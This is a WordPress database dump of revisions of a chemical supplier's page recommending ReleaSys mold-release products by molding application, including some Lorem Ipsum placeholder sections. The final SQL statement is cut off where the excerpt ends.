INSERT INTO `wp_posts` VALUES (4373, 2, '2017-05-31 18:39:30', '2017-05-31 18:39:30', '<h2 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h2>\n<p>Miller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a></p>\n<p>&nbsp;</p>\n<h2><strong>Advanced Composites/FRP </strong></h2>\n<div>\n<p><img class="wp-image-4351 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.</p>\n<p>Miller-Stephenson strongly recommends use of <strong>ReleaSys<em>™</em> 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys<em>™</em> 8900</strong>, our solvent-based, low odor semi-permanent release polymer.</p>\n</div>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h2><strong>Rotational Plastics (Rotomolding)</strong></h2>\n<p><img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="212" height="142" /></p>\n<p>&nbsp;</p>\n<p>Rotational Molding is both an industry and a process that is based in the use of thermoplastic resins. The rotational molding industry continues to gain popularity around the globe, and a wider variety of thermoplastic molding resins (beyond polyethylene) is becoming available. In response to this ever-evolving industry, Miller-Stephenson has developed a robust and innovative portfolio of release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter cycles using higher temperatures and increasing complex molds with tighter tolerances. Miller-Stephenson\'s ReleaSys product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n<p>Miller-Stephenson strongly recommend <strong>ReleaSys<em>™</em> RM</strong> and <strong>ReleaSys<em>™</em> 9900</strong> for all rotational molding resins and application                                                               techniques.</p>\n<p>&nbsp;</p>\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</strong></h2>\n<p style="text-align: left;"><img class="wp-image-4366 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012-800x650.jpg" width="199" height="162" /></p>\n<p><img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n<p>Miller-Stephenson strongly recommends<strong> ReleaSys<em>™</em> 8800</strong> or <strong>ReleaSys<em>™</em> 9800</strong> for water-based applications and <strong>ReleaSys 8900</strong> if solvent-based carrier fluids is desired.</p>\n<p>&nbsp;</p>\n<h2 style="text-align: left;"><strong>Rubber / Silicone / Elastomers </strong></h2>\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\n<p><img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,  Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.  Whether you are performing injection, compression or transfer molding, Miller-Stephenson\'s ReleaSys product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. So whether you are molding O-rings, nitrile seats, heat exchanger gaskets, or motor mounts, Miller-Stephenson has a cost-effective and efficienct mold release for your application.</p>\n<p>Miller-Stephenson strongly recommends<strong> ReleaSys 8200</strong> or <strong>ReleaSys 8500</strong> both water-based products.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h4></h4>\n<h4><strong>Injection Plastics Mold Release</strong></h4>\n<p><img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" /></p>\n<p><img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\n<p>The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.</p>\n<p>&nbsp;</p>\n<h4></h4>\n<h4><strong>Fiberglass Mold Release</strong></h4>\n<p><img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" /></p>\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\n<p>The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.</p>\n<p>&nbsp;</p>\n<h4></h4>\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\n<p><img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" /></p>\n<p><img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" /></p>\n<p>The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Section with large image left</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Section with large image left</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Section with large image left</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Section with large image left</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Section with large image left</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 18:39:30', '2017-05-31 18:39:30', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4374, 2, '2017-05-31 18:41:07', '2017-05-31 18:41:07', '<h2 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h2>\n<p>Miller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a></p>\n<p>&nbsp;</p>\n<h2><strong>Advanced Composites/FRP </strong></h2>\n<div>\n<p><img class="wp-image-4351 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.</p>\n<p>Miller-Stephenson strongly recommends use of <strong>ReleaSys<em>™</em> 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys<em>™</em> 8900</strong>, our solvent-based, low odor semi-permanent release polymer.</p>\n</div>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h2><strong>Rotational Plastics (Rotomolding)</strong></h2>\n<p><img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="212" height="142" /></p>\n<p>&nbsp;</p>\n<p>Rotational Molding is both an industry and a process that is based in the use of thermoplastic resins. The rotational molding industry continues to gain popularity around the globe, and a wider variety of thermoplastic molding resins (beyond polyethylene) is becoming available. In response to this ever-evolving industry, Miller-Stephenson has developed a robust and innovative portfolio of release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter cycles using higher temperatures and increasing complex molds with tighter tolerances. Miller-Stephenson\'s ReleaSys product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n<p>Miller-Stephenson strongly recommend <strong>ReleaSys<em>™</em> RM</strong> and <strong>ReleaSys<em>™</em> 9900</strong> for all rotational molding resins and application                                                               techniques.</p>\n<p>&nbsp;</p>\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</strong></h2>\n<p style="text-align: left;"><img class="wp-image-4366 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_505351012-800x650.jpg" width="199" height="162" /></p>\n<p><img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n<p>Miller-Stephenson strongly recommends<strong> ReleaSys<em>™</em> 8800</strong> or <strong>ReleaSys<em>™</em> 9800</strong> for water-based applications and <strong>ReleaSys 8900</strong> if solvent-based carrier fluids is desired.</p>\n<p>&nbsp;</p>\n<h2 style="text-align: left;"><strong>Rubber / Silicone / Elastomers </strong></h2>\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\n<p><img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,  Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.  Whether you are performing injection, compression or transfer molding, Miller-Stephenson\'s ReleaSys product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. So whether you are molding O-rings, nitrile seats, heat exchanger gaskets, or motor mounts, Miller-Stephenson has a cost-effective and efficienct mold release for your application.</p>\n<p>Miller-Stephenson strongly recommends<strong> ReleaSys 8200</strong> or <strong>ReleaSys 8500</strong> both water-based products.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h4></h4>\n<h4><strong>Injection Plastics Mold Release</strong></h4>\n<p><img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" /></p>\n<p><img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\n<p>The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.</p>\n<p>&nbsp;</p>\n<h4></h4>\n<h4><strong>Fiberglass Mold Release</strong></h4>\n<p><img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" /></p>\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\n<p>The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.</p>\n<p>&nbsp;</p>\n<h4></h4>\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\n<p><img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" /></p>\n<p><img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" /></p>\n<p>The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers </h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 18:41:07', '2017-05-31 18:41:07', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4375, 2, '2017-05-31 18:44:57', '2017-05-31 18:44:57', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4340" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers </h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 18:44:57', '2017-05-31 18:44:57', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4376, 2, '2017-05-31 19:06:23', '2017-05-31 19:06:23', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" width="100" padding="5px 30px 10px 30px" position_y="90" bg="rgba(255, 255, 255, 0.94)"]\n\n<h3 class="uppercase"><strong>Choosing ReleaSys™ By Application\n</strong></h3>\n<p>Miller-Stephenson’s exclusive mold release product line, ReleaSys™ , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. </p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" 